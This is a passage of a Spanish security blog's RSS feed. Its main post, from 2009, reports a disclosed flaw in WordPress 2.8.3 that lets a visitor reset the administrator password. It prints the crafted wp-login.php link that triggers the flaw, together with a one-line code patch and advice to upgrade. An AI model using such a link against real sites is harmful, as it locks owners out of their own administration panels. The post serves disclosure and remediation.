href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/dos-en-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Reseteo Remoto del Password de Admin en WordPress</title><link>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml</link> <comments>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml#comments</comments> <pubDate>Wed, 12 Aug 2009 04:36:49 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2948</guid> <description><![CDATA[No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3. Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su [...]]]></description> <content:encoded><![CDATA[<p>No se que pasa con <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> últimamente, el investigador Francés “<a
href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html" target="_blank">Laurent Gaffié</a>” acaba de publicar  un <a
href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html">full-disclosure</a> en el que explica una <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> en la ultima versión de WordPress 2.8.3.</p><p
style="text-align: center;"><img
title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2" src="http://img241.imageshack.us/img241/6261/wordpressbug.jpg" alt="wordpressbug Reseteo Remoto del Password de Admin en WordPress"  /></p><p>Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el <a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a> de <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de un <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a> que no valida adecuadamente.<span
id="more-2948"></span><br
/> Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:</p><pre><a href="http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag">http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag</a></pre><p>La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:</p><p><code>if ( empty( $key ) )</code></p><p>y remplazarlo por:</p><p><code>if ( empty( $key ) || is_array( $key ) )</code></p><p>Aunque como siempre es recomendable que actualices tu versión a la <a
href="http://wordpress.org/download/" target="_blank">WordPress a la 2.8.4</a> aun no sale oficialmente en <a
title="español" href="../tag/espanol">español</a>, pero puedes utilizar este <a
href="http://es-wordpress.googlecode.com/files/wp-2.8.3-es_ES.zip">paquete de idiomas para traducirlo</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a
href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a
href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li><li><a
href="http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml" title="2 Problemas graves que se solucionan en WordPress 2.6.2">2 Problemas graves que se solucionan en WordPress 2.6.2</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>8</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 39/126 queries in 0.128 seconds using disk: basic
Object Caching 4019/4155 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 21:29:52 -->
